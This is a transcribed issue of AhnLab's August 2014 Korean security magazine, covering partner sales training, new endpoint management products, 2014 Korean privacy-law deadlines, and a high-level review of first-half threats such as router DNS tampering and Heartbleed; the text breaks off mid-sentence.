Endpoint Strategy 2014. 08 안랩 온라인 보안 매거진
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Endpoint Strategy
2014. 08
안랩 온라인 보안 매거진
2
3
5
8
1 1
1 4
1 8
2 2
2 5
2 6
월간
C O N T E N T S
S p O T l i g h T
Partner Step-up Training Day 2014
2014년 하반기 안랩 제품의 세일즈 포인트는?
S p E C i a l R E p O R T
엔드포인트 보안 관리 솔루션 신제품 출시
안랩, 엔드포인트 보안 관리의 새 ‘판’을 짜다
h O T i S S u E
2014 하반기 주의해야 할 정보보호 법령들
달라지는 주요 법령, 점검 사항은?
F O C u S i N - D E p T h
악성코드 분석가가 예측한 하반기 보안 위협은?
T h R E aT a N a ly S i S
전격 해부! 공유기 DNS 변조 공격의 실체
T E C h R E p O R T
P2P AnAlySiS
1부_P2P 기술의 그림자, 불법 파일 공유를 막아라
i T & l i F E
느려진 PC 빠르게 사용하는 방법
스마트폰 보안 수칙, ‘이것’만은 지키자!
a h N l a b N E w S
안랩, 전사 교육 프로그램 개편
안랩, 2014 지배구조 우수기업 ‘우수상’ 수상!
S TaT i S T i C S
2014년 6월 보안 통계 및 이슈
2014. 08
3
통합보안 기업 안랩이 지난 7월 18일, 22일 양일에 걸쳐 안랩 판교 사옥 대강당에서 네트워크 및 소프트웨어 파트너사 영업대표를
대상으로 ‘2014 안랩 파트너 스텝업 트레이닝 데이(AhnLab Partner Step-up Training Day 2014, 이하 스텝업)’를 개최했다. 이 행
사에서 안랩은 최근 출시한 신제품과 기존 제품의 업그레이드 내용, 그리고 이 제품들의 세일즈 포인트를 소개했다. 또한 출시 예정
인 안랩 라이선스 프로그램과 하반기 파트너 프로그램에 대해 파트너 영업대표들과 공유하는 자리를 가졌다.
partner Step-up Training Day 2014S p O T l i g h T
Partner Step-up Training Day 2014
2014년 하반기 안랩 제품의 세일즈 포인트는?
행사 첫날인 18일에는 안랩 네트워크 제품 파트너사 영업대표를 위한 세션이 마련되었다. 안랩 제품기획팀 유명호 팀장은 지난 7월초 출시된
트러스가드(TrusGuard) 2.1.4 버전의 주요 기능들을 소개하고, 차세대 방화벽으로 진화하고 있는 트러스가드의 세일즈 포인트에 대해 설명했
다. 특히 더욱 강력해진 애플리케이션 콘트롤 기능을 비롯해 경쟁사 대비 우위를 점하고 있는 방화벽 성능에 대해 집중 소개했다.
두 번째 세션에서는 지난 6월말 출시된 네트워크 보안 통합 관리 제품인 ‘안랩 TSM’에 대한 설명이 이어졌다. 안랩 TSM은 ▲조직 내 다수의
안랩 네트워크 보안 장비 운영 정책의 일괄 또는 개별 설정 ▲보안 장비 시스템을 비롯해 네트워크, 가상 사설망(VPn), 보안 현황에 대한 통합
모니터링 환경 ▲빅데이터 환경에 최적화된 대용량 로그 저장 및 분석, 관리 기능을 제공한다. 이를 통해 기업 보안 관리자는 기업의 전반적인
네트워크 보안 현황을 한 눈에 파악하고, 고도화된 사이버 보안 위협에 신속하고 정확히 대응할 수 있다.
세 번째 세션에서는 안랩 RMA(Return Merchandise Authorization) 프로그램의 성과 공유와 함께 하반기 업-셀링/윈백 프로그램에 대해 설
명했다.
행사 두 번째 날인 7월 22일에는 안랩 소프트웨어 파트너사를 위한 다양한 세션이 마련되었다. 첫 번째 세션의 강연자인 안랩 제품기획팀 이
건용 과장은 ‘V3 9.0, 어떻게 달라지나’라는 주제로 V3 iS 9.0, V3 ES 9.0, V3 net 9.0의 개선 기능에 대해 설명했다. V3 9.0 제품군은 폐쇄망 이
슈 대응이 가능하도록 네트워크 모듈 분리 설치가 가능해진다. 특히 고급 화면을 선택해야 볼 수 있었던 주요 기능을 메뉴 바 형태의 메인 Ui
에 제공함으로써 사용자들이 빠르고 쉽게 메뉴를 선택할 수 있도록 사용성을 개선했다.
두 번째 세션에서는 7월 30일 출시한 엔드포인트 관리 제품군에 대한 자세한 소개가 진행됐다. 해당 제품은 Ahnlab Policy Center 4.6,
Ahnlab EMS, Ahnlab Patch Management, Ahnlab Privacy Management Suite, Ahnlab 내PC지키미, Ahnlab ERS 등 총 6개 제품이다.
안랩 제품기획팀 김재만 대리는 “이번 엔드포인트 관리 제품 출시에 있어서 제품 기능 개선은 물론이고, 제품 판매 구성 및 가격 전략까지 변
화를 주었다. 이 변화에 따라 안랩은 높은 퀄리티의 제품을 합리적인 가격에 고객에게 제공할 수 있게 됐다”고 강조했다. 특히 파트너 영업대
표들은 이날 처음으로 소개된 엔드포인트 통합 관리 플랫폼인 Ahnlab EMS와 웹기반의 리포팅 시스템인 Ahnlab ERS에 큰 관심을 보이며,
추가 자료를 요청하기도 했다.
▲ 안랩은 7월 18일과 22일, 양일에 걸쳐 ‘2014 안랩 파트너 스텝업 트레이닝 데이’를 가졌다.
4
이어진 세 번째 세션에서는 출시 예정인 안랩 라이선스 프로그램(Ahnlab license Program)이 소개되었다. 안랩 라이선스 프로그램은 일정한
구매 볼륨과 제품에 따라 SlP(Selected license Program)과 ElP(Enterprise license Program)로 구성되어 있다. SlP는 V3를 구매하고자 하
는 중소기업 및 중견기업에 적합한 프로그램이며, ElP는 V3와 엔드포인트 통합 관리 솔루션을 함께 구매하고자 하는 중견 및 대기업(클라이언
트 기준 100copy 이상)에 적합한 프로그램이다. 이 두 가지 프로그램 모두 3년 라이선스 비용을 계약 기간 동안 연간 분할 납부할 수 있어 초
기 도입 비용 부담을 줄일 수 있는 것은 물론, 전체 도입 비용이 최대 60%까지 절감된다.
마지막 세션에서는 ‘파트너 프로그램, 이것만은 알고 가자!’는 주제로 하반기에 달라지는 안랩의 제품과 더불어 안랩의 데모 프로그램, RMA 프
로그램, 엔드포인트 관리 제품군의 신규 프로모션 프로그램 등 각종 마케팅 프로그램에 대한 설명이 이어졌다.
안랩은 매년 4회에 걸쳐 파트너 영업 대표를 대상으로 세일즈 역량 강화를 도모하고자 이 행사를 개최하고 있다. 이번 ‘2014 안랩 파트너 스텝
업 트레이닝 데이’는 지난 3월 이어 올해 두 번째로 개최된 행사이다.
▲ 파트너 영업대표들은 ‘2014 안랩 파트너 스텝업 트레이닝 데이’를 통해 안랩 제품의 변화와 다양한 파트너 프로그램에 대한 정보를 얻을 수 있었다.
▲ 안랩 제품기획팀 이건용 과장(左)과 김재만 대리(右)가 각각 V3 IS 9.0과 APC 4.6 제품의 변화에 대해 소개했다.
▲ 이날 행사에서 파트너사 영업대표들은 새롭게 선보이는 안랩 라이선싱 프로그램과 하반기 파트너 프로그램에 대해 큰 관심을 나타냈다.
5
안랩은 자사 클라이언트 PC 및 서버 보안 제품군을 효율적으로 관리할 수 있는 엔드포인트 중앙관리 솔루션인 ‘안랩 폴리시 센터
4.6(AhnLab Policy Center 4.6, 이하 APC 4.6)’을 출시했다. 또한 APC 4.6을 비롯한 다수의 엔드포인트 보안 관리 솔루션을 설치 및
운용할 수 있는 하드웨어 형태의 엔드포인트 통합 관리 플랫폼인 ‘AhnLab EMS’와 웹 리포팅 시스템 ‘AhnLab ERS’도 함께 출시했
다. 기존의 엔드포인트 보안 관리 제품군의 라인업을 소프트웨어 형태의 개별 솔루션과 하드웨어 형태의 플랫폼으로 완전히 개편한
것이다. 이는 안랩의 엔드포인트 통합 보안 전략의 일환으로, 이와 함께 주요 엔드포인트 보안 관리 솔루션들의 기능을 강화하는 등
자사 엔드포인트 보안 솔루션의 고도화를 본격화하고 있다.
Endpoint Management S p E C i a l R E p O R T
APC 4.6, AhnLab EMS, AhnLab ERS 등 엔드포인트 관리 신제품 출시
안랩, 엔드포인트 보안 관리의 새 ‘판’을 짜다
악성코드, OS 및 애플리케이션 취약점 등 전통적인 PC 취약점을 비롯해 개인정보보호법까지 최근 기업의 엔드포인트를 둘러싼 위협 요소가 다
변화됨에 따라 기업이 도입하는 엔드포인트 보안 솔루션의 수도 늘어나고 있다. 그러나 조직 내 수많은 엔드포인트 시스템에 설치된 다양한 보
안 솔루션에 대한 관리 부족으로 백신을 설치하고도 악성코드에 의한 피해를 입는 등 상당수 기업의 엔드포인트 보안 수준은 여전히 우려스럽
다. 게다가 다수의 엔드포인트 보안 솔루션을 설치하고 운용하는 시스템의 안정성 문제도 기업 보안 관리자에게 또 다른 부담이 되고 있다.
이에 안랩은 다수의 엔드포인트 시스템과 보안 솔루션을 개별 또는 효율적으로 통합 관리하기 위한 ▲엔드포인트 중앙관리 솔루션인 APC 4.6
과 ▲안정적인 하드웨어 기반의 엔드포인트 통합 관리 플랫폼 Ahnlab EMS ▲보안 정책에 따라 별도로 연동하여 사용할 수 있는 웹 리포팅
시스템 Ahnlab ERS를 새롭게 출시했다. 이를 통해 보안 관리자의 부담은 최소화하고 업무 효율성을 높이면서 안정적인 환경에서 개별 엔드
포인트 보안 솔루션의 운용 효과가 기대된다. 또한 이들은 전문 패치관리 솔루션인 ‘안랩 패치매니지먼트(Ahnlab Patch Management, 이하
APM)’, 개인정보 유출 방지 솔루션인 ‘안랩 프라이버시 매니지먼트 스위트(Ahnlab Privacy Management Suite, 이하 APrM Suite)’, PC 취약
점 점검 솔루션인 ‘안랩 내PC지키미’와 연계해 통합적인 엔드포인트 보안 관리 체계를 구현, 기업의 전반적인 엔드포인트 보안 수준을 향상시
킨다.
강력하고 스마트한 엔드포인트 보안 관리, APC 4.6APC 4.6은 안랩의 클라이언트 PC 및 서버용 보안 솔루션 V3 제품군을 중앙에서 효율적으로 관리할 수 있는 엔드포인트 중앙관리 솔루션으로,
리눅스 기반의 시스템에 설치 및 운용할 수 있다. APC 4.6은 다양한 중앙 제어 기능과 직관적인 관리자 화면을 제공해 보안 관리자의 부담은
최소화하고 엔드포인트 보안 솔루션의 운용 효과는 극대화한다. ▲다수의 V3 제품군을 중앙에서 일괄 관리하고 ▲악성코드 확산 방지를 위한
사전 방역 정책을 설정할 수 있다. 또한 ▲자산관리, 원격지원 등 데스크톱 관리(Desktop Management) 기능을 제공해 기업 내 전체 PC에 대
한 효율적인 제어가 가능해 위협 발생 시 중앙에서 신속하게 조치할 수 있다.
이 밖에도 기존 APC 제품 대비, 보고서 정합성 등 동기화 성능을 대폭 개선했으며 어플라이언스 형태로 제공됐던 기존의 APC 어플라이언스
(APC Appliance)보다 기업의 환경과 요구에 맞게 유연하게 적용할 수 있다. 한편 APC 4.6은 출시와 함께 CC인증(EAl3)을 획득했다.
6
엔드포인트 통합 관리 플랫폼 Ahnlab EMS
모든 보안 시스템이 그렇듯, 엔드포인트 보안 솔루션을 운영함에 있어서도 ‘중단 없는(seamless)’ 안정성이 기본이며 가장 중요하다. 이에
안랩은 엔드포인트 보안 시스템의 안정성을 확보하고 시스템의 유지•보수 편의성을 위해 하드웨어 형태의 엔드포인트 통합 관리 플랫폼인
Ahnlab EMS를 출시했다.
Ahnlab EMS는 엔드포인트 관리 시스템(Endpoint Management System)의 약자로, APC 4.6, APrM Suite 등 안랩의 다양한 엔드포인트
보안 솔루션을 개별 또는 동시 설치하고 안정적으로 운용할 수 있다. 안랩이 제시하는 엔드포인트 통합 보안 체계의 핵심이 APC 4.6이라면
Ahnlab EMS는 주춧돌이라 할 수 있다.
Ahnlab EMS를 기반으로 한 엔드포인트 보안 솔루션 설치 및 운용의 최고 장점은 단일 에이전트다. 다수의 솔루션을 하나의 에이전트로 동시
에 운용할 수 있으며 하나의 통합 콘솔을 통해 관리가 가능하다. 사용자의 불편은 최소화하면서 기존 APC 어플라이언스 기반의 통합 관리 체
계의 강점은 그대로 제공하는 것이다.
안랩이 기존의 APC 어플라이언스 대신 각 개별 솔루션과 하드웨어 형태의 플랫폼인 Ahnlab EMS로 엔드포인트 관리 솔루션 제품군의 라인업
을 개편한 이유는 명확하다. 안정적인 하드웨어 플랫폼을 기반으로 각 기업의 환경과 니즈에 따라 필요한 제품을 유연하게 적용 및 사용할 수
있는 환경을 제공하는 것. 플랫폼을 기반으로 다수의 보안 솔루션을 통합 운용하거나 내PC지키미 등 특정 솔루션은 별도로 운용할 수도 있다.
즉, 다양한 고객사별 요구 사항을 적극적으로 반영한다는 안랩의 기조에 따른 것으로, 산업별•사업장별 각기 다른 실질적인 사용 방식을 고려한
것이다. 이와 함께 기업의 규모와 환경에 따라 효율적으로 적용할 수 있도록 Ahnlab EMS 2000P부터 10000PR까지 다양한 모델을 제공한다.
더 강력한 엔드포인트 보안을 위한 안랩의 다각화•고도화 전략
안랩은 고객의 다양한 요구 사항을 반영하기 위한 노력으로 Ahnlab ERS도 출시했다. Ahnlab ERS(Endpoint Reporting System)는 웹 기반
의 모니터링 및 리포팅 전용 시스템으로, 다수의 엔드포인트 보안 솔루션의 운용 현황에 대해 다양한 형태의 보고서를 제공한다. 보안에 민감
한 공공 및 일부 산업 분야에서는 보안 솔루션의 설치 및 운용 환경과 이에 대한 모니터링 환경을 별도로 구현해야 하는 경우가 있다. 이러한
환경에서는 구체적인 현황 파악을 위해 정확한 정보는 물론, 효율적인 모니터링이 가능한 직관성과 접근성이 요구된다. Ahnlab ERS는 웹 기
▲ ‘AhnLab Policy Center 4.6’ 관리자 화면
▲ 엔드포인트 통합 관리 플랫폼 ‘AhnLab EMS’
7
반의 유연한 접근성과 직관적인 Ui, 각종 통계 보고서, 예약 보고서 등 다양한 기능을 통해 통합 모니터링의 효율성과 관리자의 편의성을 극대
화한다.
안랩은 엔드포인트 보안 솔루션의 라인업을 개편함과 동시에 주요 엔드포인트 보안 솔루션의 기능을 강화했다. 공공 부문을 중심으로 꾸준히
관심을 받고 있는 PC 취약점 점검 솔루션인 Ahnlab 내PC지키미가 대표적이다. ▲백신 강제 업데이트 등 취약 항목 자동조치 기능 ▲설문 기
능 등 사용자 정의 보안 점검 기능을 추가하고 ▲리포트 기능을 강화했으며 ▲취약점 점검 항목을 기존 16개에서 37개로 확대했다. 특히 타사
내PC지키미 제품과 달리 안랩은 자사 패치관리 솔루션인 APM 연동을 통한 자동조치가 가능하다. 또한 고객의 환경에 따라 단독 서버 버전도
제공해 개별 마스터/콘솔/에이전트를 이용할 수 있다. 이 외에도 개인정보 유출 방지 솔루션인 APrM Suite는 개인정보를 선별해 워터마크를
출력할 수 있는 기능을 추가했으며, 패치관리 솔루션 APM 역시 연내 업그레이드를 진행할 예정이다.
안랩 제품기획실 정진교 실장은 “APC 4.6 등 안랩의 다양한 엔드포인트 보안 관리 솔루션을 안정적인 플랫폼인 Ahnlab EMS에 설치 및 운용
함으로써 기업의 엔드포인트 보안 현황을 한눈에 파악하고 다양한 위협에 신속하게 대응할 수 있다”며 “기업의 핵심 지점인 엔드포인트를 더
욱 안전하게 보호하기 위해 엔드포인트 보안 솔루션을 다각화•고도화하기 위해 최선의 노력을 다할 것”이라고 밝혔다.
한편 안랩은 APC 4.6 등 신제품 출시와 함께 자사 엔드포인트 보안 솔루션 구매 고객을 위한 차별적인 구매 방식인 안랩 라이선스 프로그램
(Ahnlab license Program)을 출시한다. 이 프로그램을 통해 기업은 규모와 필요에 따라 V3 제품군과 신제품인 APC 4.6, 그 외 엔드포인트
보안 솔루션을 다양한 혜택과 함께 보다 경제적인 가격으로 구매할 수 있다.
▲ ‘AhnLab 내PC지키미’ 사용자 화면
8
Complianceh O T i S S u E
8
한국의 개인정보보호법이 개인정보보호에 관한 한 세계에서 가장 엄격한 규제 중 하나라는 사실은 익히 알려져 있다. 그럼에도 불구
하고 개인정보 유출 사고는 지난 몇 년간 끊이지 않고 있으며 이를 막기 위한 법령 또한 창과 방패의 싸움처럼 반복적으로 강도를 높
여가고 있다. 이미 상반기가 훌쩍 지나버린 2014년이지만 올 하반기에는 특히 주의해야 할 법령 개정안의 적용 시점들이 있어 정리
해 보고자 한다.
2014 하반기 주의해야 할 정보보호 법령들
달라지는 주요 법령, 점검 사항은?
2013년 8월 6일에 개정된 개인정보보호법 개정안이 올해 8월 7일부터 시행된다.
기업에서 챙겨 봐야 할 중요한 조항은 다음과 같다.
1. 개인정보 수집 시 정보주체의 동의를 받는 경우 필요한 최소한의 정보 외에는 수집에 동의하지 않을 수 있다는 사실을
구체적으로 알리고 동의를 받아야 함 (개인정보보호법 제16조2항)
현재 대부분 기업의 개인정보 수집이용 동의절차 양식에는 개인정보의 수집항목과 수집이용목적, 보유 및 이용기간 등과 함께 동의를 거부할
권리가 있다는 사실과 동의거부에 따른 불이익에 대한 고지 내용만 기재되어 있을 것이다. 앞으로 기업은 이용자(고객)에게 제공하려는 서비스
를 위해 반드시 필요한 최소한의 개인정보 항목이 무엇인지 구체적으로 밝히고 그 외의 다른 개인정보에 대해서는 이용자가 제공하지 않거나
수집이용에 동의하지 않을 수 있도록 개인정보 수집양식과 동의 절차를 상세화 할 필요가 있다.
2. [중요] 주민등록번호 처리의 제한 (개인정보보호법 제24조의2)
8월 7일부터 개인정보 중 주민등록번호를 처리하는 일은 금지된다. 많은 기업이 ARS 상담 접수 시 주민등록번호 입력을 통해 본인 확인을 하
곤 하는데 이 또한 8월 7일부터는 허용되지 않는다. 기업에게 일반적으로 허용되는 예외는 다른 법에서 ‘주민등록번호’라고 구체적으로 명시하
여 처리를 요구하거나 허용한 경우뿐이다. 법령에는 제3자의 생명, 신체, 재산의 이익을 위해 명백히 필요하다고 인정되는 경우(제24조의2 1
항2호)와 안전행정부령으로 정한 경우(제24조의2 1항3호)도 예외이긴 하지만 일반 기업에 적용되기란 거의 불가능하기 때문이다.
이 조항에 관련하여 기업에서 준비해야 할 일은 모든 개인정보 수집이용 양식에서 주민등록번호 수집 항목을 없애고 내부의 정보 처리 과정에
서도 주민등록번호 없이 운영 가능하도록 조치하는 일이다. 서류 처리 과정은 물론이고 문서의 양식, 전산시스템의 데이터 구조에서도 법적인
근거가 없는 주민등록번호 처리를 하지 않도록 바꿔야 한다. 주민등록번호는 많은 정보 처리시스템에서 특정 개인을 식별하고 다른 사항과 개
인을 연결하는 키(Key)로 쓰이곤 한다. 이런 목적의 주민등록번호 사용은 기술적으로 대체 가능한 다른 값으로 바꿔 사용하고, 기존 주민등록
번호를 계속 사용해야만 하는 부득이한 상황이라면 관련 행정기관을 통해 ‘입법 청원’을 하라고 안전행정부는 안내하고 있다.
[모든 사업자와 공공기관]
개인정보보호법 개정안: 2014년 8월 7일부터 시행
99
3. 개인정보보호 관련 법규 위반 시 처벌 강화 (제34조의2, 제65조)
개인정보보호 관련 법규 위반 행위가 있다고 인정될 만한 상당한 이유가 있는 경우 안전행정부 장관은 책임 있는 자를 징계할 것을 그 소속기
관/단체 장에게 권고할 수 있도록 하고 있는데, 개정안에서는 ‘책임 있는 자’를 ‘대표자 및 책임 있는 임원을 포함한다’라고 구체화하고 있다.
또한 주민등록번호에 관련하여 주민등록번호가 분실/도난/유출/변조 또는 훼손된 경우에 5억원 이하의 과징금을 부과할 수 있도록 처벌이 강
화되었다. 이 처벌을 경감시키려면 개인정보의 안전성확보조치(제24조제3항)를 충분한 수준으로 이행하고 있어야만 한다.
2012년 2월 17일 일부 개정된 ‘정보통신망 이용촉진 및 정보보호 등에 관한 법률(이하 정통망법)’은 2012년 8월 18일 시행되었고 정보통신서
비스제공자는 법 시행일로부터 2년 이내에 보유하고 있는 주민등록번호를 파기하도록 규정하고 있다. 그 2년이 종료되는 시점이 오는 2014년
8월 17일이다.
정보통신서비스 제공자가 보유한 주민등록번호의 파기 완료
정보통신서비스 제공자는 2014년 8월 17일까지 보유한 주민등록번호를 모두 파기해야 한다. 물론 법적인 예외 근거가 있다면 파기 대상에서
제외할 수 있다. 법적 예외란, 본인확인기관으로 지정 받았거나, 법령에서 주민등록번호의 수집이용을 허용한 경우이거나, 방통위 고시에 따라
주민등록번호 수집을 허용 받은 경우에 해당된다. 개인정보보호법과 마찬가지로 법적인 근거가 있는 경우를 제외하고 일반 기업에서 다른 예
외를 적용 받기란 쉽지 않아 보인다.
기업에서 혼란스러워 하는 것은 개인정보보호법과 정통망법의 파기 시한이 다르다는 점이다. 개인정보보호법은 2016년 8월 6일이 주민등록
▲ 주민등록번호 처리 필요 시 입법 청원 안내 출처: 안전행정부
[표] 개인정보의 안정성 확보 조치
구분 주요 내용
내부관리계획(제3조)• 보호책임자 지정 및 역할과 책임, 취급자 교육 등
※ 소상공인은 내부관리계획 수립의무 면제
접근 권한 관리(제4조)• 업무수행에 필요한 최소한의 범위로 차등 부여
• 접근권한 부여 기록은 최소 3년간 보관
비밀번호 관리(제5조) • 비밀번호 작성규칙 수립 의무화
접근통제시스템(제6조)• 방화벽 등 접근통제시스템 설치 운영
• 업무용 컴퓨터만을 이용해 개인정보 처리시, 접근통제시스템 설치 의무 면제(O/S, 보안프로그램의 접근통제기능 이용)
암호화(제7조)
• 암호화 대상: 고유식별정보, 비밀번호, 바이오 정보
• 암호화 기준
- (전송시) 정보통신망 송수신 등의 경우 암호화
- (저장시) ① 비밀번호 및 바이오 정보 암호화(비밀번호는 일방향 암호화) ② 고유식별정보는 인터넷구간, DMZ 구간 저장시
암호화하고 내부망 저장시 위험도 분석에 따라 암호화 적용 여부, 적용범위 결정
(단, 주민번호는 내부망 저장 시에도 암호화해야 함)
접속기록 보관(제8조) • 최소 6개월 이상 보관
보안프로그램(제9조) • 백신소프트웨어 등 보안프로그램 설치, 자동 또는 일 1회 이상 업데이트
물리적 접근 방지(제10조) • 개인정보 물리적 보관 장소에 대한 출입통제 절차 등
[정보통신서비스 제공자 대상]
정보통신망 이용촉진 및 정보보호 등에 관한 법률: 2014년 8월 17일까지
1010
번호 파기 완료 시한이고 정통망법은 2014년 8월 17일이 완료 시한이다. 만약 어떤 회사가 영리적 목적으로 온라인 서비스를 하고 있고 그 서
비스를 이용하는 회원을 보유하고 있다면 회원들의 주민등록번호는 올해 8월 17일까지 파기해야 하는 것이다. 흔히 정보통신 서비스를 온라
인 게임이나 포털 사이트, 인터넷 쇼핑몰 정도로만 떠올리는데 요즘 대부분의 금융거래나 주식매매도 인터넷으로 가능하고 휴양림 예약이나
지자체의 특산물 판매 등과 같이 공공기관 또한 영리 목적의 인터넷 서비스를 제공한다는 점을 감안하면 법 적용 대상이 의외로 많음을 알 수
있다. 파기할 데이터를 저장하고 있는 장비는 서버와 같은 대형 정보처리시스템 외에 일반 PC에 저장한 자료도 포함되며 ‘복구 재생할 수 없게
끔’ 파기해야 한다는 조건을 유념해야 하겠다(예를 들어 PC에서 Delete키나 Shift-Delete키를 눌러 삭제하는 정도로는 안 된다는 뜻이다.)
[정보통신서비스 제공자 대상]
정보통신망법 개정: 2014년 11월 29일부터
2014년 5월 28일 정보통신망법이 개정되었다. 시행 시점은 6개월 뒤인 2014년 11월 29일부터이다.
1. 최소한의 개인정보 수집 제한 조항 구체화 (제23조 1,2항 개정, 3항 신설)
기존 법령에도 개인정보 수집은 서비스 제공을 위하여 필요한 최소한의 정보에 한정된다는 조항이 있었다. 다만 ‘최소한’의 범위란 기준이 모
호하기 때문에 사업자 잣대로만 판단하는 폐단이 없지 않았다. 개정 법령에서는 ‘최소한의 개인정보’란 ‘해당 서비스의 본질적 기능을 수행하
기 위해 반드시 필요한 정보’라고 명시함으로써 전보다는 의미가 뚜렷해졌다.
2. 영업 양수 시 양도업체의 기존 고객들에게 개인정보의 이전 사실을 알려야 함 (제26조2항)
기존 법령에는 개인정보 이전 사실을 정보주체들에게 알려야 할 의무가 양도업체에게 우선적으로 있었으며 양도업체가 이전 사실을 알린 경
우 양수업체는 통지 의무가 없었다. 개정 법령은 양도업체와 양수업체 모두 개인정보 이전 사실을 정보 주체에게 알리도록 의무화함으로써 설
령 양도업체가 미이행한 일이 생기더라도 양수업체를 통해 정보 주체가 이전 사실을 확인할 수 있도록 하였다. 양도•양수 두 업체가 모두 개인
정보 이전 통지를 하게 될 경우 비용의 낭비가 될 수도 있겠지만 중복 비용보다 개인정보 이전에 관한 정보 주체의 권리를 더 중시하겠다는 정
부 의지를 읽을 수 있는 부분이다.
3. 정보 누출 사고 발생 시 24시간 내 신고 의무 (제27조의3)
개인정보 누출(도난/분실) 사고 발생 시 정보통신서비스 제공자는 ‘지체 없이’ 이용자와 방송통신위원회에 누출 사실을 알리도록 하였으나 이
역시 ‘지체 없이’의 의미가 자의적으로 해석되어 ‘최대한 빠른 시간 내’라는 본 의미를 충족시키기 어려운 문제가 있었다. 이번 개정안에서는
‘24 시간 내’라는 시한을 구체적으로 정함으로써 사업자의 빠른 신고 대응을 촉구하고 있다.
4. 개인정보 ‘파기’의 의미 구체화 및 파기 관련 위규 시 2년 이하 징역 2천만원 이하 벌금의 형사 처벌(제29조, 제30조, 제73조)
이 조항은 이번 개정안에서 가장 파괴력이 큰 부분이다. 기존에도 개인정보의 ‘파기’란 복구 재생할 수 없는 상태로 만드는 것이라는 해설이 있
었다. 개정안에는 아예 법 조항에 ‘복구 재생할 수 없도록 파기’ 해야 한다고 명시하였다. 개인정보 수집 이용 목적이 달성되었거나 수집 보유
기간이 종료된 이후, 사업 폐업 후에도 개인정보를 파기하지 않는 경우엔 2년 이하의 징역 또는 2천만원 이하의 벌금에 해당하는 형사 처벌을
할 수 있도록 하였다. 과거에는 개인정보의 기술적/관리적 보호조치 기준을 이행하지 않더라도 3천만원 이하의 과태료 부과가 처벌의 전부였
다. 앞으로는 파기를 하지 않고 있는 상황만으로도 형사처벌을 받을 수 있기 때문에 부적절한 개인정보 보유는 기업 개인정보보호 책임자에게
최대의 위협이 될 수 있다.
5. 법정 손해 배상의 청구 (제32조의 2 신설)
2014년 11월 29일부터 개인정보가 분실/도난/누출되는 사고가 발생하면 이용자는 300만원 이하의 범위에서 손해배상을 청구할 수 있다. 정
보통신서비스 제공자는 고의 또는 과실로 법 규정을 위반하지 않았다는 사실을 입증하지 않으면 책임을 면할 수 없고 법원은 변론 취지와 증
거 조사 결과를 고려해서 법정 손해 배상금액을 인정하게끔 하였다. 기존 법령과 차이가 큰 점은 사업자의 과실과 개인정보 유출 사고의 직접
적인 인과관계가 드러나지 않고 이용자가 입은 피해의 범위를 산정할 근거가 모호하더라도 일정 금액 범위의 법정 손해배상 지급을 선고할 수
있게끔 되었다는 사실이다. 기업 입장에서 법에서 정한 모든 기술적/관리적 보호조치 기준을 100% 충족시키기란 현실적으로 어려울 수 있기
때문에 개인정보 유출사고가 일단 발생하면 이용자에 대한 대규모의 손해배상 부담을 피해가기 어렵게 된 것이다.
개인정보보호 법령이 강화될수록 국민 입장에서는 안심이 되겠지만 기업 입장에서는 가중되는 정보보호 비용 부담에 신음소리가 높아지는 듯
하다. 하지만 한편으로 이런 상황까지 이르게 한 근본 원인은 개인정보를 국민의 안전 관점에서 보지 않고 관리의 편의성이나 영업 대상으로
만 취급하여 방만하게 보유하고 이용해 온 관행의 적폐일 수도 있다. 이제라도 쇄신하여 꼭 필요한 목적, 꼭 필요한 양 이외의 개인정보는 완전
파기하고 최소한의 정보만을 안전하게 보관하는 선도적인 보안 문화가 정착되기를 기대해 본다.
11
F O C u S i N - D E p T h Review & predict
악성코드 분석가가 예측한
하반기 보안 위협은?
2014년 상반기 보안 동향 및 하반기 예측
2014년 상반기는 개인정보 유출, 윈도 XP 서비스 지원 종료, 스피어피싱, 스미싱 등의 보안 위협이 이슈가 되었다. 이에 따라 월간
‘안’ 7월호에서는 2014년 상반기 이슈를 대표할만한 사건과 용어를 살펴본 바 있다. 이번 호에서는 ASEC(안랩시큐리티대응센터)에
서 발표한 2014년 상반기 보안 동향과 하반기 보안 위협 예측을 소개한다.
2014년 상반기 보안 동향
하이브리드 악성코드
악성코드 제작자는 더 이상 플랫폼을 구분하지 않는다. 이제까지 PC
악성코드 제작자는 PC만을 대상으로 악성코드를 제작하고, 모바일 악
성코드 제작자는 모바일 플랫폼을 대상으로 악성코드를 제작했다. 그
러나 2014년 상반기에 발견된 악성코드 중 일부는 PC를 먼저 감염
시킨 후 모바일 단말기에 악성코드를 감염시키는 기능을 포함하고 있
다. 이 악성코드는 감염된 PC로 모바일 단말기가 연결되는 것을 감지
해 악성 앱을 설치한다. 또 공유기의 취약점을 공격해 공유기에 설정
된 DnS 정보를 변조하는 기법도 확인되었다. 과거에는 PC의 호스트
(hosts) 파일을 변조해 유명 사이트 접근시 피싱 사이트로 연결을 유
도했다. 반면 최근에는 공유기의 취약점을 이용해 DnS 설정을 변경
하는 방법으로 변조된 공유기에 연결된 PC와 모바일 단말기 모두에
영향을 미치는 방법도 활용하고 있다.
POS 시스템 보안 문제
2013년 말 미국 유명 유통사의 POS(Point-of-Sales) 시스템이 해킹 당
해 7,000만 명 이상의 개인정보가 유출되었다. 이 사건 이후 미국 백화
점, 식당 등의 POS 시스템 해킹으로 신용카드 정보 유출이 꾸준히 발생
하고 있다. 국내에서도 POS 단말기를 해킹해 유출한 정보로 149장의
위조 카드를 만든 일당이 검거되었다. 이들은 POS 시스템 공급 업체의
서버를 해킹해 정상 파일을 악성코드로 교체하는 방식을 이용했다.
IoT 보안 문제 시작
사물인터넷(ioT)의 보안 문제가 발생하기 시작했다. 보통 리눅스로 운
영되는 인터넷 공유기를 감염시키는 웜이 등장한 것. 가상화폐인 비트
코인이 유행하면서 일부 악성코드는 비트코인 채굴 기능도 포함하고
있다. 국내에서도 무선 인터넷 공유기의 DnS 주소를 변경해 악성코
드 배포에 이용했고 DDoS 공격에 냉난방 관리용 셋톱박스가 이용된
사례가 발생하기도 했다. 아직 대부분의 사물인터넷에는 보안 기능이
존재하지 않아 근본적인 해결이 어려운 상태이다.
12
심각한 서버보안 취약점 연이어 등장
지난 상반기에는 심각한 서버 보안 취약점들이 다수 보고되었다.
첫 번째로 알려진 ‘하트블리드(HeartBleed)’ 취약점은 한글로 표현하
면 ‘심장출혈’이라는 의미를 가진다. 그 이름만큼이나 강한 인상을 남
겼던 해당 취약점(CVE-2014-0160)은 SSl/TlS를 구현한 OpenSSl
라이브러리 상의 문제로 메모리상에 올려진 민감한 데이터가 노출
